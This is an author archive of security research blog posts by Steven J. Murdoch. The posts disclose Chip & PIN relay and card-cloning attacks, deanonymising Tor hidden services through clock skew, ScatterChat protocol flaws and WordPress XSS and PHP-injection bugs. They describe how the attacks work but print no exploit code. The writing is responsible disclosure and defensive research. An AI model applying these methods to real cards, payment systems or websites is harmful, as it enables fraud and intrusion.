All posts by Steven J. Murdoch

About Steven J. Murdoch

I am Professor of Security Engineering and Royal Society University Research Fellow in the Information Security Research Group of the Department of Computer Science at University College London (UCL), and a member of the UCL Academic Centre of Excellence in Cyber Security Research. I am also a bye-fellow of Christ’s College, Innovation Security Architect at the OneSpan, Cambridge, a member of the Tor Project, and a Fellow of the IET and BCS. I teach on the UCL MSc in Information Security. Further information and my papers on information security research is on my personal website. I also blog about information security research and policy on Bentham's Gaze.

Chip & PIN relay attacks

Saar Drimer and myself have shown that the Chip & PIN system, used for card payments in the UK, is vulnerable to a new kind of fraud. By “relaying” information from a genuine card, a Chip & PIN terminal in another shop, can be made to accept a counterfeit card. We previously discussed this possibility in “Chip & Spin” but it was not until now that we implemented and tested the attack.

A fraudster sets up a fake terminal in a busy shop or restaurant. When a genuine customer inserts their card into this terminal, the fraudster’s accomplice, in another shop, inserts their counterfeit card into the merchant’s terminal. The fake terminal reads details from the genuine card, and relays them to the counterfeit card, so that it will be accepted. The PIN is recorded by the fake terminal and sent to the accomplice for them to enter, and they can then walk off with the goods. To the victim, everything was normal, but when their statement arrives, they will find that they have been defrauded.

Equipment used in relay attack

From the banks’ perspective, there will be nothing unusual about this transaction. To them, it will seem as if the real card was used, with a chip and along with the correct PIN. Banks have previously claimed that if a fraudulent Chip & PIN transaction was placed, then the customer must have been negligent in protecting their card and PIN, and so must be liable. This work shows that despite customers taking all due care in using their card, they can still be the victim of fraud.

For more information, we have a summary of the technique and FAQ. This attack will be featured on Watchdog, tonight (6 February) at 19:00 GMT on BBC One. The programme will show how we successfully sent details between two shops in the same street, but it should work equally well, via mobile phone, to the other side of the world.

It is unlikely that criminals are currently using techniques such as this, as there are less sophisticated attacks which Chip & PIN remains vulnerable to. However, as security is improved, the relay attack may become a significant source of fraud. Therefore, it is important that defences against this attack are deployed sooner rather than later. We discuss defences in our draft academic paper, submitted for review at a peer reviewed conference.

Update (2007-01-10): The segment of Watchdog featuring our contribution has been posted to YouTube.

23rd Chaos Communication Congress

23C3 logoThe 23rd Chaos Communication Congress will be held later this month in Berlin, Germany on 27–30 December. I will be attending to give a talk on Hot or Not: Revealing Hidden Services by their Clock Skew. Another contributor to this blog, George Danezis, will be talking on An Introduction to Traffic Analysis.

This will be my third time speaking at the CCC (I previously talked on Hidden Data in Internet Published Documents and The Convergence of Anti-Counterfeiting and Computer Security in 2004 then Covert channels in TCP/IP: attack and defence in 2005) and I’ve always had a great time but this year looks to be the best yet. Here are a few highlights from the draft programme, although I am sure there are many great talks I have missed.

It’s looking like a great line-up, so I hope many of you can make it. See you there!

Hot or Not: Revealing Hidden Services by their Clock Skew

Next month I will be presenting my paper “Hot or Not: Revealing Hidden Services by their Clock Skew” at the 13th ACM Conference on Computer and Communications Security (CCS) held in Alexandria, Virginia.

It is well known that quartz crystals, as used for controlling system clocks of computers, change speed when their temperature is altered. The paper shows how to use this effect to attack anonymity systems. One such attack is to observe timestamps from a PC connected to the Internet and watch how the frequency of the system clock changes.

Absolute clock skew has been previously used to tell whether two apparently different machines are in fact running on the same hardware. My paper adds that because the skew depends on temperature, in principle, a PC can be located by finding out when the day starts and how long it is, or just observing that the pattern is the same as a computer in a known location.

However, the paper is centered around hidden services. This is a feature of Tor which allows servers to be run without giving away the identity of the operator. These can be attacked by repeatedly connecting to the hidden service, causing its CPU load, hence temperature, to increase and so change the clockskew. Then the attacker requests timestamps from all candidate servers and finds the one demonstrating the expected clockskew pattern. I tested this with a private Tor network and it works surprisingly well.

In the graph below, the temperature (orange circles) is modulated by either exercising the hidden service or not. This in turn alters the measured clock skew (blue triangles). The induced load pattern is clear in the clock skew and an attacker could use this to de-anonymise a hidden service. More details can be found in the paper (PDF 1.5M).

Clock skew graph

I happened upon this effect in a lucky accident, while trying to improve upon the results of the paper “Remote physical device fingerprinting“. A previous paper of mine, “Embedding Covert Channels into TCP/IP” showed how to extract high-precision timestamps from the Linux TCP initial sequence number generator. When I tested this hypothesis it did indeed improve the accuracy of clock skew measurement, to the extent that I noticed an unusual peak at about the time cron caused the hard disk on my test machine to spin-up. Eventually I realised the potential for this effect and ran the necessary further experiments to write the paper.

Protocol design is hard — Flaws in ScatterChat

At the recent HOPE conference, the “secure instant messaging (IM) client”, ScatterChat, was released in a blaze of publicity. It was designed by J. Salvatore Testa II to allow human rights and democracy activists to securely communicate while under surveillance. It uses cryptography to protect confidentiality and authenticity, and integrates Tor to provide anonymity and is bundled with an easy to use user interface. Sadly not everything is as good as it sounds.

When I first started supervising undergraduates at Cambridge, Richard Clayton explained that the real purpose of the security course was to teach students not to invent the following (in increasing order of importance): protocols, hash functions, block ciphers and modes of operation. Academic literature is scattered with the bones of flawed proposals for all of these, despite being designed by very capable and experienced cryptographers. Instead, wherever possible, implementors should use peer-reviewed building blocks, as normally there is already a solution which can do the job, but has withstood more analysis and so is more likely to be secure.

Unfortunately, ScatterChat uses both a custom protocol and mode of operation, neither which are as secure as hoped. While looking at the developer documentation I found a few problems and reported them to the author. As always, there is the question of whether such vulnerabilities should be disclosed. It is likely that these problems would be discovered eventually, so it is better for them to be caught early and users allowed to take precautions, rather than attackers who independently find the weaknesses being able to exploit them with impunity. Also, I hope this will serve as a cautionary tale, reminding software designers that cryptography and protocol design is fraught with difficulties so is better managed through open peer-review.

The most serious of the three vulnerabilities was published today in an advisory (technical version), assigned CVE-2006-4021, from the ScatterChat author, but I also found two lesser ones. The three vulnerabilities are as follows (in increasing order of severity): Continue reading Protocol design is hard — Flaws in ScatterChat

Downtime

Light Blue Touchpaper will be inaccessible for around 19 hours due to building maintenance. The server will be powered off at 22:00 UTC, Saturday 15 July and should be restarted at 17:00 UTC, Sunday 16 July. However, potential problems with the server or networking equipment on restoration of power may prevent access to the site until Monday.

Update: 17:30 UTC, Sunday 16 July
The power is on, the electronic locks let me in, network connectivity, DHCP and DNS works and the coffee machine is up and running. So that is the Computer Lab critical infrastructure in operation and LBT is back online.

Update: Tuesday 25 July
There will be another downtime for the Light Blue Touchpaper server on Wednesday 26 July, 7:00–10:00 UTC, due to work on our electricity supply.

Protecting software distribution with a cryptographic build process

At the rump session of PET 2006 I presented a simple idea on how to defend against a targeted attacks on software distribution. There were some misunderstandings after my 5 minute description, so I thought it would help to put the idea down in writing and I also hope to attract more discussion and a larger audience.

Consider a security-critical open source application; here I will use the example of Tor. The source-code is signed with the developer’s private key and users have the ability to verify the signature and build the application with a trustworthy compiler. I will also assume that if a backdoor is introduced in a deployed version, someone will notice, following from Linus’s law — “given enough eyeballs, all bugs are shallow”. These assumptions are debatable, for example the threats of compiler backdoors have been known for some time and subtle security vulnerabilities are hard to find. However a backdoor in the Linux kernel was discovered, and the anonymous reporter of a flaw in Tor’s Diffie-Hellman implementation probably found it through examining the source, so I think my assumptions are at least partially valid.

The developer’s signature protects against an attacker mounting a man-in-the-middle attack and modifying a particular user’s download. If the developer’s key (or the developer) is compromised then a backdoor could be inserted, but from the above assumptions, if this version is widely distributed, someone will discover the flaw and raise the alarm. However, there is no mechanism that protects against an attacker with access to the developer’s key singling out a user and adding a backdoor to only the version they download. Even if that user is diligent, the signature will check out fine. As the backdoor is only present in one version, the “many eyeballs” do not help. To defend against this attack, a user needs to find out if the version they download is the same as what other people receive and have the opportunity to verify.

My proposal is that the application build process should first calculate the hash of the source code, embed it in the binary and make it remotely accessible. Tor already has a mechanism for the last step, because each server publishes a directory descriptor which could include this hash. Multiple directory servers collect these and allow them to be downloaded by a web browser. Then when a user downloads the Tor source code, he can use the operating system provided hashing utility to check that the package he has matches a commonly deployed one.

If a particular version claims to have been deployed for some time, but no server displays a matching hash, then the user knows that there is a problem. The verification must be performed manually for now, but an operating system provider could produce a trusted tool for automating this. Note that server operators need to perform no extra work (the build process is automated) and only users who believe they may be targeted need perform the extra verification steps.

This might seem similar to the remote-attestation feature of Trusted Computing. Here, computers are fitted with special hardware, a Trusted Platform Module (TPM), which can produce a hard to forge proof of the software currently running. Because it is implemented in tamper-resistant hardware, even the owner of the computer cannot produce a fake statement, without breaking the TPM’s defences. This feature is needed for applications including DRM, but comes with added risks.

The use of TPMs to protect anonymity networks has been suggested, but the important difference between my proposal and TPM remote-attestation is that I assume most servers are honest, so will not lie about the software they are running. They have no incentive to do so, unless they want to harm the anonymity of the users, and if enough servers are malicious then there is no need to modify the client users are running, as the network is broken already. So there is no need for special hardware to implement my proposal, although if it is present, it could be used.

I hope this makes my scheme clearer and I am happy to receive comments and suggestions. I am particularly interested in whether there are any flaws in the design, whether the threat model is reasonable and if the effort in deployment and use is worth the increased resistance to attack.

Oracle attack on WordPress

This post describes the second of two vulnerabilities I found in WordPress. The first, a XSS vulnerability, was described last week. While the vulnerability discussed here is applicable in fewer cases than the previous one, it is an example of a comparatively rare class, oracle attacks, so I think merits further exposition.

An oracle attack is where an attacker can abuse a facility provided by a system to gain unauthorized access to protected information. The term originates from cryptology, and such attacks still crop up regularly; for example in banking security devices and protocols. The occurrence of an oracle attack in WordPress illustrates the need for a better understanding of cryptography, even by the authors of applications not conventionally considered to be cryptographic software. Also more forgiving primitives and better robustness principles could reduce the risk of future weaknesses.

The vulnerability is a variant of the ‘cache’ shell injection bug reported by rgodm. This is caused by an unfortunate series of design choices by the WordPress team, leading to arbitrary PHP execution. The WordPress cache stores commonly accessed information from the database, such as user profile data, in files for faster retrieval. Despite them being needed only by the server, they are still accessible from the web, which is commonly considered bad practice. To prevent the content being read remotely, the data is placed in .php files, commented out with //. Thus when executed by the web server, in response to a remote query, they return an empty file.

However, putting user controlled data in executable files is inherently a risky choice. If the attacker can escape from the comment then arbitrary PHP can be executed. rgodm’s shell injection bug does this by inserting a newline into the display name. Now all the attacker must do is guess the name of the .php file which stores his cached profile information, and invoke it to run the injected PHP. WordPress puts an index.php in the cache directory to suppress directory indexing, and filenames are generated as MD5(username || DB_PASSWORD) || “.php”, which creates hard to guess name. The original bug report suggested brute forcing DB_PASSWORD, the MySQL authentication password, but the oracle attack described here will succeed even if a strong password is chosen.

Continue reading Oracle attack on WordPress

Anatomy of an XSS exploit

Last week I promised to follow up on a few XSS bugs that I found in WordPress. The vulnerabilities are fixed in WordPress 2.0.3, even though the release notes do not mention their existence. I think there are a number of useful lessons that can be drawn from them, so in this post I will describe some more details.

The goal of a classic XSS exploit is to run arbitrary Javascript, in the context of a another webpage, which retrieves the user’s cookies. With WordPress I will concentrate on the comment management interface. Here, the deletion button has a Javascript onclick event handler to display a confirmation dialog, which includes the comment author’s name. If malicious input can break out of the dialog box text, then when an administrator activates the button, the attacker’s Javascript is run, allowing access to the admin user’s cookies. I found two classes of bugs which allowed me to do this.

Continue reading Anatomy of an XSS exploit

Chip and skim 2

The 12:30 ITN news on ITV1 today featured a segment (video) on Chip and PIN, and should also be shown at 19:00 and 22:30. It included an interview with Ross Anderson and some shots of me presenting our Chip and PIN interceptor. The demonstration was similar to the one shown on German TV but this time we went all the way, borrowing a magstripe writer and producing a fake card. This was used by the reporter to successfully withdraw money from an ATM (from his own account).

More details on how the device actually works are on our interceptor page. The key vulnerabilities present in the UK Chip and PIN cards we have tested, which the interceptor relies on, are:

  • The entered PIN is sent from the terminal to the card in unencrypted form
  • It is still possible to use magstripe-only cards to withdraw cash, with the same PIN used in shops
  • All the details necessary to create a valid magstripe are also present on the chip

This means that a crook could insert a miniaturised version of the interceptor into the card slot of a Chip and PIN terminal, without interfering with the tamper detection. The details it collects include the PIN and enough information to create a valid magstripe. The fake card can now be used in ATMs which are willing to accept cards, which from its perspective, have a damaged chip — known as “fallback”. Some ATMs might even not be able to read the chip at all, particularly ones abroad.

The fact that the chip also includes the magstripe details is not strictly necessary, since a skimmer could also read this, but the design of some Chip and PIN terminals, which only cover the chip, make this difficult. One of the complaints against the terminals used in the Shell fraud was that they make it impossible to read the chip without reading the magstripe too. This led to suggestions that customers should not use such terminals, or even that they wipe their card’s magstripe to prevent skimmers from reading it.

While it is possible that the Shell fraudsters did read the magstripe, wiping it will not be a defence against them reading the communication between terminal and chip, which includes all the needed details. Even the CVV1, the code used to verify that a magstripe is valid, is on the chip (but not the CVV2, which is the 3 digit code printed on the back, used by ecommerce). This was presumably a backwards-compatibility measure, as was magstripe fallback. As shown by countless examples before, such features are frequently the source of security flaws.

XSS vulnerabilities fixed in WordPress 2.0.3

Users are strongly urged to upgrade their version of WordPress to 2.0.3 (as you will see that we have already!) This release fixes two XSS vulnerabilities that I reported to WordPress on 14 Apr 2006 and 4 May 2006, although they are not mentioned in the release announcement. These are exploitable in the default installation and can readily lead to arbitrary PHP code execution.

I think there a number of interesting lessons to learn from these vulnerabilities, so I plan to post more details in 10 days time (thereby giving users a chance to upgrade). The nature of the problem can probably be deduced from the code changes, so there is limited value in waiting much longer.

I will also discuss a refinement of the ‘cache’ shell injection bug reported by rgodm, which is also fixed by WordPress 2.0.3. The new attack variant I discovered no longer relies on a guessable database password, but only applies when the Subscribe To Comments plugin is also activated. The latest version of the plugin (2.0.4) mitigates this attack, but upgrading WordPress is still recommended.